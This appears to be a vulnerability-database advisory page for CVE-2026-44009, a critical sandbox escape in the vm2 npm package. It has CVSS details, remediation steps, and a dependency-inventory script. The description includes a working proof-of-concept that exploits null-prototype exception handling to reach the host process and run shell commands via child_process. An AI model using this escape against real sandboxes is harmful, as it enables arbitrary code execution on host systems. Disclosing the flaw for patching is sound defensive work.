
VM2 CVE-2026-44009

CRITICAL 9.8 (CVSS 3.1)
Exposure of Resource to Wrong Sphere (CWE-668)
2026-05-08 · https://github.com/patriksimek/vm2 · GHSA-9vg3-4rfj-wgcm

CVSS Vector (NVD)

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: High
Availability: High

Lifecycle Timeline

Source Code Evidence Fetched: May 08, 2026 - 17:00 (vuln.today)
Analysis Generated: May 08, 2026 - 17:00 (vuln.today)
CVE Published: May 08, 2026 - 16:20 (nvd)

Blast Radius (ecosystem impact)

Dependents are taken from the transitive dependency graph; vuln.today resolves it to a 4-path depth.
  • 10 npm packages depend on vm2 (2 direct, 8 indirect)

Ecosystem-wide dependent count for version 3.11.2.

Description (NVD)

Summary

VM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system.

Details

In handleException, because of the hardening noted in the source as `// SECURITY (post-GHSA-mpf8 hardening): use from (not ensureThis)`, exceptions with a null prototype are assumed to come from the other side and to already be proxied. Therefore, it is possible to obtain both the proxied and the unproxied object of a sandbox object with a null prototype when it is thrown and then caught, which allows obtaining the host `Function` object.

PoC

```js
const {VM} = require("vm2");
const vm = new VM();
console.log(vm.run(`
const o = {__proto__: null};
try {
	throw o;
} catch (e) {
	e.f = Buffer.prototype.inspect
	o.f.constructor("return process")().mainModule.require('child_process').execSync('touch pwned');
}
`));
```

Impact

Attackers can perform Remote Code Execution under the assumption that arbitrary code can be executed inside the context of a vm2 sandbox.

Analysis (AI-generated)

Remote code execution in VM2 (npm package) allows complete sandbox escape via null-prototype exception handling flaw. Attackers can execute arbitrary system commands on the host by exploiting a logic error in the exception proxy mechanism that incorrectly handles objects with null prototypes. …


Remediation (AI-generated)

Within 24 hours: identify all applications and services using VM2 npm package via dependency scanning and inventory; assess whether each deployment accepts untrusted user-supplied code for sandbox execution. Within 7 days: if VM2 is used to isolate untrusted code, isolate affected systems from production networks or disable the vulnerable functionality immediately; contact vendor for patch timeline. …
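The dependency-inventory step above can be scripted against a project's package-lock.json. The following is an added example, not vuln.today's or vm2's code: it lists every chain through which vm2 is pulled in, split into direct and transitive. The lock file contents are constructed sample data, 3.11.2 is the version named in the blast radius section, and the script assumes npm's hoisted node_modules/<name> layout (nested node_modules paths are not resolved).

```javascript
// Added example (not vuln.today's or vm2's code): inventory how a project
// depends on vm2 from its package-lock.json (lockfileVersion 2 or 3).
// SAMPLE_LOCK is constructed sample data standing in for a real lock file.
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    "": { dependencies: { "code-runner": "^1.0.0", "vm2": "3.11.2" } },
    "node_modules/code-runner": { version: "1.0.0", dependencies: { "vm2": "3.11.2" } },
    "node_modules/vm2": { version: "3.11.2", dependencies: { "acorn": "^8.7.0" } },
    "node_modules/acorn": { version: "8.7.0" },
  },
};

// Assumption: packages are hoisted, so a name maps to node_modules/<name>.
function keyFor(name) {
  return `node_modules/${name}`;
}

// Return every dependency chain from the root ("") to `target`, each as an
// array of package names. maxDepth bounds the walk (and breaks cycles), like
// the 4-path depth vuln.today uses for its blast-radius graph.
function findDependencyPaths(lock, target, maxDepth = 4) {
  const pkgs = lock.packages || {};
  const paths = [];
  const walk = (key, chain) => {
    for (const dep of Object.keys(pkgs[key]?.dependencies || {})) {
      const next = [...chain, dep];
      if (dep === target) { paths.push(next); continue; }
      if (next.length < maxDepth && pkgs[keyFor(dep)]) walk(keyFor(dep), next);
    }
  };
  walk("", []);
  return paths;
}

// Summarise for an inventory report: resolved version, direct vs transitive
// chains, and the chains themselves for triage of who pulls vm2 in.
function reportVm2(lock) {
  const paths = findDependencyPaths(lock, "vm2");
  return {
    version: lock.packages?.[keyFor("vm2")]?.version ?? null,
    direct: paths.filter((p) => p.length === 1).length,
    transitive: paths.filter((p) => p.length > 1).length,
    paths: paths.map((p) => ["(root)", ...p].join(" > ")),
  };
}

console.log(JSON.stringify(reportVm2(SAMPLE_LOCK), null, 2));
```

To run it against a real project, replace SAMPLE_LOCK with `JSON.parse(require("fs").readFileSync("package-lock.json", "utf8"))`; a null version with zero paths means the lock file does not reference vm2 at all.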



CVE-2026-44009 vulnerability details – vuln.today
